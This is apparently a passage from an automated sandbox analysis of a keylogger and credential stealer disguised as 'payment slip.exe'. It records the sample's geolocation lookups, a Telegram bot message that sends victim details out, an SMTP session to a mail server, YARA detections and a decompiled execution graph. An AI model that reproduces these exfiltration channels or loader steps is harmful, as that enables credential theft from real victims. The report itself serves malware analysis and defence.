                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5613
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9520tVE3pr%2F7SfbLR9jUBWg%2BEeiK4BpdxI3L7vkM20a%2F7V7JxOoZYW3VFouF6nmKbm3a6ovFfowLkrw2roZAfAnlJ8K3QaZw2%2BH7hyAgbcX9RmjfkkBHYUXAScNWEPrzGD4eyEG"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb65afba3c328-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.749710188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-31 07:00:37 UTC703INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:37 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5615
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m54q6j1DpivIPE0wvjLYSrg72HiRzql38gV%2FXZCi%2B6FuwaJs5LHJPgR1jb6vqHmrECJoPO4oWKG261rXoym2axhk4tbxhFuH6aUxHwQflDsHvfWhinUil8txV8ym5JGk5BxdVqTY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb6633c514302-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.749712188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:39 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-31 07:00:40 UTC703INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:39 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5617
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oK0SS4G7JUxldr6GTvPQBWDT2zYbyfBdfE%2FkGVlG16T9WlEokauiqABD1nM6uYASQ7EDtTZ%2BHbUI3EFzCKwlN2wwggCWAQbruEJQw39wBRKz9mNQFPRSCqnPcesuXgT3bJtUWiaV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb6718865423b-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.749714188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-31 07:00:42 UTC705INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:42 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5620
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn97%2FVhtCrPa8pkGwO2UgKPUyFTnQI7AXBBpPt9Q7kVv7mkQTglzv5oTgiJBXaRy6CnYDZsYF7TbjJd0dSzCn%2FTlAKwP3jOEirm2TkdtokqPj5oVTERO2EX3RdwtR%2BP1DNlKoW6D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb686dfdac34d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.749716188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:43 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-31 07:00:44 UTC709INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:43 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5621
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PA0UB%2BLX6PKlaEj6vm76yfjxgdWZwYKXKR2k4F0lHsGJZqRigszwCSV%2B5C%2B4vxTR%2FVS9decScKy8Tgr%2BAaDxdBQ3T1KTDnbjpaTNCi63BCWeLhCBRjCZKHUGho3OhbnBEkGLQm6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb68ecdcdc33a-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.749719188.114.96.34431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:45 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-31 07:00:45 UTC711INHTTP/1.1 200 OK
                                      Date: Wed, 31 Jul 2024 07:00:45 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5623
                                      Last-Modified: Wed, 31 Jul 2024 05:27:02 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5A8tUIlh0U4lHJjQHxvf3uN2c661j5dknk1%2FefJAgGHDW5aYd3Z0nNqNw46QM2vsI9ywVtnW5T%2Fczqu13JocRo%2B0ry%2FWfa3K%2FaAGKVXMoa0tVSfjRRzT1O%2FUz4CM6rAwNBm3CBCe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8abbb6972ed78c3f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-31 07:00:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-31 07:00:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.749721149.154.167.2204431104C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-31 07:00:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-07-31 07:00:46 UTC344INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Wed, 31 Jul 2024 07:00:46 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-31 07:00:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Jul 31, 2024 09:00:53.700608015 CEST58749725208.91.199.115192.168.2.7220-bh-13.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 31 Jul 2024 12:30:53 +0530
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Jul 31, 2024 09:00:53.700831890 CEST49725587192.168.2.7208.91.199.115EHLO 536720
                                      Jul 31, 2024 09:00:53.857491970 CEST58749725208.91.199.115192.168.2.7250-bh-13.webhostbox.net Hello 536720 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 31, 2024 09:00:53.857744932 CEST49725587192.168.2.7208.91.199.115STARTTLS
                                      Jul 31, 2024 09:00:54.015309095 CEST58749725208.91.199.115192.168.2.7220 TLS go ahead

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:00:26
                                      Start date:31/07/2024
                                      Path:C:\Users\user\Desktop\payment slip.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\payment slip.exe"
                                      Imagebase:0x30000
                                      File size:1'065'472 bytes
                                      MD5 hash:0CAC6A293391FDB0F89189A89DC47150
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:03:00:27
                                      Start date:31/07/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\payment slip.exe"
                                      Imagebase:0x1b0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0.9%
                                        Signature Coverage:2.8%
                                        Total number of Nodes:1974
                                        Total number of Limit Nodes:52
                                        execution_graph 96830 3b023b0 96844 3b00000 96830->96844 96832 3b0247c 96847 3b022a0 96832->96847 96834 3b024a5 CreateFileW 96836 3b024f4 96834->96836 96837 3b024f9 96834->96837 96837->96836 96838 3b02510 VirtualAlloc 96837->96838 96838->96836 96839 3b0252e ReadFile 96838->96839 96839->96836 96840 3b02549 96839->96840 96841 3b012a0 13 API calls 96840->96841 96842 3b0257c 96841->96842 96843 3b0259f ExitProcess 96842->96843 96843->96836 96850 3b034a0 GetPEB 96844->96850 96846 3b0068b 96846->96832 96848 3b022a9 Sleep 96847->96848 96849 3b022b7 96848->96849 96851 3b034ca 96850->96851 96851->96846 96852 32de3 96853 32df0 __wsopen_s 96852->96853 96854 32e09 96853->96854 96856 72c2b ___scrt_fastfail 96853->96856 96868 33aa2 96854->96868 96858 72c47 GetOpenFileNameW 96856->96858 96859 72c96 96858->96859 96926 36b57 96859->96926 96863 72cab 96863->96863 96865 32e27 96896 344a8 96865->96896 96938 71f50 96868->96938 96871 33ae9 96944 3a6c3 96871->96944 96872 33ace 96873 36b57 22 API calls 96872->96873 96875 33ada 96873->96875 96940 337a0 96875->96940 96878 32da5 96879 71f50 __wsopen_s 96878->96879 96880 32db2 GetLongPathNameW 96879->96880 96881 36b57 22 API calls 96880->96881 96882 32dda 96881->96882 96883 33598 96882->96883 96995 3a961 96883->96995 96886 33aa2 23 API calls 96887 335b5 96886->96887 96888 335c0 96887->96888 96889 732eb 96887->96889 97000 3515f 96888->97000 96895 7330d 96889->96895 97012 4ce60 41 API calls 96889->97012 96894 335df 96894->96865 97013 34ecb 96896->97013 96899 73833 97035 a2cf9 96899->97035 96900 34ecb 94 API calls 96902 344e1 96900->96902 96902->96899 96904 344e9 96902->96904 96903 73848 96905 7384c 96903->96905 96906 73869 96903->96906 96908 73854 96904->96908 96909 344f5 96904->96909 97062 34f39 96905->97062 96907 4fe0b 22 API calls 96906->96907 96917 738ae 96907->96917 97068 9da5a 82 API calls 96908->97068 97061 3940c 136 API calls 2 library calls 96909->97061 96913 73862 96913->96906 96914 32e31 96915 73a5f 96919 73a67 96915->96919 96916 34f39 68 API calls 96916->96919 96917->96915 96917->96919 96923 39cb3 22 API calls 96917->96923 97069 9967e 22 API calls __fread_nolock 96917->97069 97070 995ad 42 API calls _wcslen 96917->97070 97071 a0b5a 22 API calls 96917->97071 97072 3a4a1 22 API calls __fread_nolock 96917->97072 97073 33ff7 22 API calls 96917->97073 96919->96916 97074 9989b 82 API calls __wsopen_s 96919->97074 96923->96917 96927 36b67 _wcslen 96926->96927 96928 74ba1 96926->96928 96931 36ba2 96927->96931 96932 36b7d 96927->96932 96929 393b2 22 API calls 96928->96929 96930 74baa 96929->96930 96930->96930 96934 4fddb 22 API calls 96931->96934 97706 36f34 22 API calls 96932->97706 96935 36bae 96934->96935 96936 4fe0b 22 API calls 96935->96936 96937 36b85 __fread_nolock 96936->96937 96937->96863 96939 33aaf GetFullPathNameW 96938->96939 96939->96871 96939->96872 96941 337ae 96940->96941 96950 393b2 96941->96950 96943 32e12 96943->96878 96945 3a6dd 96944->96945 96949 3a6d0 96944->96949 96946 4fddb 22 API calls 96945->96946 96947 3a6e7 96946->96947 96948 4fe0b 22 API calls 96947->96948 96948->96949 96949->96875 96951 393c9 __fread_nolock 96950->96951 96952 393c0 96950->96952 96951->96943 96951->96951 96952->96951 96954 3aec9 96952->96954 96955 3aed9 __fread_nolock 96954->96955 96956 3aedc 96954->96956 96955->96951 96960 4fddb 96956->96960 96958 3aee7 96970 4fe0b 96958->96970 96962 4fde0 96960->96962 96963 4fdfa 96962->96963 96965 4fdfc 96962->96965 96980 5ea0c 96962->96980 96987 54ead 7 API calls 2 library calls 96962->96987 96963->96958 96966 5066d 96965->96966 96988 532a4 RaiseException 96965->96988 96989 532a4 RaiseException 96966->96989 96968 5068a 96968->96958 96971 4fddb 96970->96971 96972 5ea0c ___std_exception_copy 21 API calls 96971->96972 96973 4fdfa 96971->96973 96976 4fdfc 96971->96976 96992 54ead 7 API calls 2 library calls 96971->96992 96972->96971 96973->96955 96975 5066d 96994 532a4 RaiseException 96975->96994 96976->96975 96993 532a4 RaiseException 96976->96993 96978 5068a 96978->96955 96986 63820 __dosmaperr 96980->96986 96981 6385e 96991 5f2d9 20 API calls __dosmaperr 96981->96991 96983 63849 RtlAllocateHeap 96984 6385c 96983->96984 96983->96986 96984->96962 96986->96981 96986->96983 96990 54ead 7 API calls 2 library calls 96986->96990 96987->96962 96988->96966 96989->96968 96990->96986 96991->96984 96992->96971 96993->96975 96994->96978 96996 4fe0b 22 API calls 96995->96996 96997 3a976 96996->96997 96998 4fddb 22 API calls 96997->96998 96999 335aa 96998->96999 96999->96886 97001 3516e 97000->97001 97005 3518f __fread_nolock 97000->97005 97003 4fe0b 22 API calls 97001->97003 97002 4fddb 22 API calls 97004 335cc 97002->97004 97003->97005 97006 335f3 97004->97006 97005->97002 97007 33605 97006->97007 97011 33624 __fread_nolock 97006->97011 97009 4fe0b 22 API calls 97007->97009 97008 4fddb 22 API calls 97010 3363b 97008->97010 97009->97011 97010->96894 97011->97008 97012->96889 97075 34e90 LoadLibraryA 97013->97075 97018 34ef6 LoadLibraryExW 97083 34e59 LoadLibraryA 97018->97083 97019 73ccf 97020 34f39 68 API calls 97019->97020 97023 73cd6 97020->97023 97025 34e59 3 API calls 97023->97025 97027 73cde 97025->97027 97026 34f20 97026->97027 97028 34f2c 97026->97028 97105 350f5 97027->97105 97029 34f39 68 API calls 97028->97029 97031 344cd 97029->97031 97031->96899 97031->96900 97034 73d05 97036 a2d15 97035->97036 97037 3511f 64 API calls 97036->97037 97038 a2d29 97037->97038 97376 a2e66 97038->97376 97041 350f5 40 API calls 97042 a2d56 97041->97042 97043 350f5 40 API calls 97042->97043 97044 a2d66 97043->97044 97045 350f5 40 API calls 97044->97045 97046 a2d81 97045->97046 97047 350f5 40 API calls 97046->97047 97048 a2d9c 97047->97048 97049 3511f 64 API calls 97048->97049 97050 a2db3 97049->97050 97051 5ea0c 